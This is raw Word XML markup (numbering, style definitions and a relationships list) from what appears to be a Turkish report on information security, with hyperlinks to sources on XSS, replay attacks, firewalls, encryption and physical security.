  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="54">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="55">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="56">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="57">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="58">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="59">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="60">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="61">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="62">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="63">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="64">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="66">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="67">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="68">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="69">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="70">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="71">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="72">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="73">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="74">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="75">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="76">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="77">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="78">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="79">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="80">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="81">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8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95"/>
    <w:rsid w:val="005112F4"/>
    <w:rsid w:val="007C7991"/>
    <w:rsid w:val="00E77DF4"/>
    <w:rsid w:val="00FF5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F5DD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{96AA73E1-E8DB-4928-95A8-55B43043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F4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Balk1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Balk1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E77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7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77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7DF4"/>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E77DF4"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListeParagraf">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E77DF4"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AltBilgi">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AltBilgiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E77D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DF4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TBal">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Balk1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E77DF4"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="T2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E77DF4"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="216"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="T1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E77DF4"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLncedenBiimlendirilmi">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLncedenBiimlendirilmiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E7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7DF4"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="title-text">
    <w:name w:val="title-text"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="00E77DF4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nowrap">
    <w:name w:val="nowrap"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="00E77DF4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="authors-info">
    <w:name w:val="authors-info"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="00E77DF4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tlid-translation">
    <w:name w:val="tlid-translation"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="00E77DF4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Balk2Char">
    <w:name w:val="Başlık 2 Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="Balk2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E77D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77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77D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DF4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ResimYazs">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E77DF4"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="fotograflar">
    <w:name w:val="fotograflar"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="fotograflarChar"/>
    <w:qFormat/>
    <w:rsid w:val="00E77DF4"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fotograflarChar">
    <w:name w:val="fotograflar Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="fotograflar"/>
    <w:rsid w:val="00E77DF4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AralkYok">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E77DF4"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00E77DF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77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7DF4"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style6">
    <w:name w:val="style6"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="00E77DF4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Balk3Char">
    <w:name w:val="Başlık 3 Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="Balk3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E77DF4"/>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E77DF4"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Gl">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00E77DF4"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Vurgu">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00E77DF4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SatrNumaras">
    <w:name w:val="line number"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E7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wikipedia.org/w/index.php?title=%C4%B0P_filtreleme&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techopedia.com/definition/13612/eavesdropping"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hyperlink" Target="https://tureng.com/tr/turkce-ingilizce/gizlilik" TargetMode="External"/><Relationship Id="rId138"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59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wmaraci.com/nedir/e-mail" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.burakeksi.com/iso-27001-bilgi-guvenliginde-fiziksel-ve-cevresel-guvenlik-1/" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2.bp.blogspot.com/-IFIzGkZPPCo/V9GgWRYgTGI/AAAAAAAAAQU/G2dEDSMDcwo4wdUZwUIBmiVOp04pwL4mgCLcB/s1600/Screen%2BShot%2B2016-09-08%2Bat%2B20.29.02.png"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hyperlink" Target="https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Y%C4%B1%C4%9F%C4%B1n_mesaj"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dergipark.org.tr/download/article-file/465726" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dogukankaradag.com/eavesdropping-attack-ile-desifre-olmak/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hanci.org/" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/w/index.php?title=Port_filtreleme&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId139"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85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tureng.com/tr/turkce-ingilizce/gizlilik" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cagataycebi.com/security/fiziksel_ve_cevresel_guvenlik.pdf"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61.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Y%C3%B6nlendirici" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.binance.vision/security/what-is-a-replay-attack" TargetMode="External"/><Relationship Id="rId140"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61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google/" TargetMode="External"/><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5.gif"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Web" TargetMode="External"/><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hyperlink" Target="https://www.hanci.org/" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Daktilo" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pusulasecurity.com/hizmetlerimiz/guvenlik-duvari-firewall/" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.udhb.gov.tr/images/hizlierisim/efcecbe1f21e9fe.pdf" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ieeexplore.ieee.org/abstract/document/6523805" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gurelahmet.com/xsscross-site-scripting-nedir-ve-xss-lab-uygulamas%C4%B1-web-for-pentester/"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2.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ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.careerride.com/Networking-replay-attacks.aspx" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.insecure.org/nmap/index.html" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Vikipedi:Kaynak_g%C3%B6sterme" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/%C4%B0nternet" TargetMode="External"/><Relationship Id="rId141"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46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.spamlaws.com/network-security.html" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sanfoundry.com/cpp-program-implement-rsa-algorith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thesecuritybuddy.com/vulnerabilities/what-is-replay-attack/" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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bgasecurity.com/" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Bilgisayar" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.emf"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/G%C3%BCvenlik_duvar%C4%B1" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hostinger.web.tr/rehberler/mac-mail-kurulumu" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bilgiguvenligi.saglik.gov.tr/files/BilgiG%C3%BCvenli%C4%9FiPolitikalar%C4%B1K%C4%B1lavuzu.pdf" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vpnpro.com/vpn-reviews/nordvpn-review/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpeg"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ieeexplore.ieee.org/abstract/document/6141247" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.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hyperlink" Target="https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/)" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/OSI_Modeli" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.spamlaws.com/network-security.html" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?biw=1366&amp;bih=608&amp;tbm=isch&amp;sa=1&amp;ei=l8XrXNDVIqHHrgSGsrkQ&amp;q=pgp+&amp;oq=pgp+&amp;gs_l=img.3..35i39l2j0l2j0i30l6.747.747..994...0.0..0.206.206.2-1......0....1..gws-wiz-img.eszA-KbO4sU"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csrc.nist.gov/csrc/media/publications/conference-paper/1998/10/08/proceedings-of-the-21st-nissc-1998/documents/early-cs-papers/karg74.pdf" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.binance.vision/tr/security/what-is-a-replay-attack" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.careerride.com/Networking-replay-attacks.aspx" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/OSI_modeli" TargetMode="External"/><Relationship Id="rId142"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63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.muhendisbeyinler.net/kriptoloji-ve-sezar-sifreleme-algoritmasi/"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eg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bgasecurity.com/" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/%C4%B0nternet" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.jpeg"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wmaraci.com/nedir/port" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cozumpark.com/bilgi-g-venli-i-ve-genel-g-venlik-kavramlar-b-l-m-2/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><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image" Target="media/image64.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.emf"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:pinar@atlas.cc.itu.edu.tr" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sgaguvenlik.com/hizmetlerimiz/guvenlik-teknolojileri/fiziki-guvenlik-ve-guvenlik-teknolojileri/" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bilgiguvenligi.saglik.gov.tr/files/BilgiG%C3%BCvenli%C4%9FiPolitikalar%C4%B1K%C4%B1lavuzu.pdf" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kodedu.com/2014/07/xss-aciklarina-karsisanitize-islemi/"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59.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Antivir%C3%BCs" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.berkgoksel.com/2016/09/web-uygulamas-guvenligi-cross-site_30.html"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s://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Denial-of-service_attack" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bgasecurity.com/makaleler/" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/coinmonks/what-is-a-replay-attack-b0e2c3b1dec4" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pgp.com/products/cybercop-scanner" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Veri" TargetMode="External"/><Relationship Id="rId143"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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=sezar+algoritmas%C4%B1+%C3%B6rne%C4%9Fi&amp;source=lnms&amp;tbm=isch&amp;sa=X&amp;ved=0ahUKEwiW__LK-a_iAhUC_aQKHedpDJoQ_AUIDigB&amp;biw=1366&amp;bih=657" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nces.ed.gov/pubs98/safetech/chapter5.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jpeg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.JPG"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mediaclick.com.tr/" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.certicom.com" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:fikretozturk2525@hotmail.com" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.guvenlikonline.com/makale/212/-erisim-kontrol-sistemleri-kullanmak-icin-7-onemli-neden.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.berkgoksel.com/2016/09/web-uygulamas-guvenligi-cross-site_30.html" TargetMode="External"/><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48.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://enterprisesecurity.symantec.com/products" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/HTTP" TargetMode="External"/><Relationship Id="rId144"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90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpeg"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bilgisayarkavramlari.sadievrenseker.com/2009/06/11/idea-uluslar-arasi-sifreleme-algoritmasi/" TargetMode="External"/><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image" Target="media/image45.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.privacyfoundation.org/education/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.guvenliweb.org.tr/dosya/sds57.pdf" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.turkhackteam.org/web-server-guvenligi/1669696-xss-nedir-cesitleri-nelerdir-teorina.html" TargetMode="External"/><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hyperlink" Target="http://www.l0pht.com/~weld/netcat/" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Bilgisayar_a%C4%9F%C4%B1" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thesecuritybuddy.com/vulnerabilities/what-is-replay-attack/" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://translate.googleusercontent.com/translate_c?depth=1&amp;hl=tr&amp;prev=search&amp;rurl=translate.google.com&amp;sl=en&amp;sp=nmt4&amp;u=https://www.infosec.gov.hk/english/technical/files/instant.pdf&amp;xid=25657,15700022,15700186,15700190,15700256,15700259&amp;usg=ALkJrhhtDoeUj3SvI1HE-QPg3VldX004Nw" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 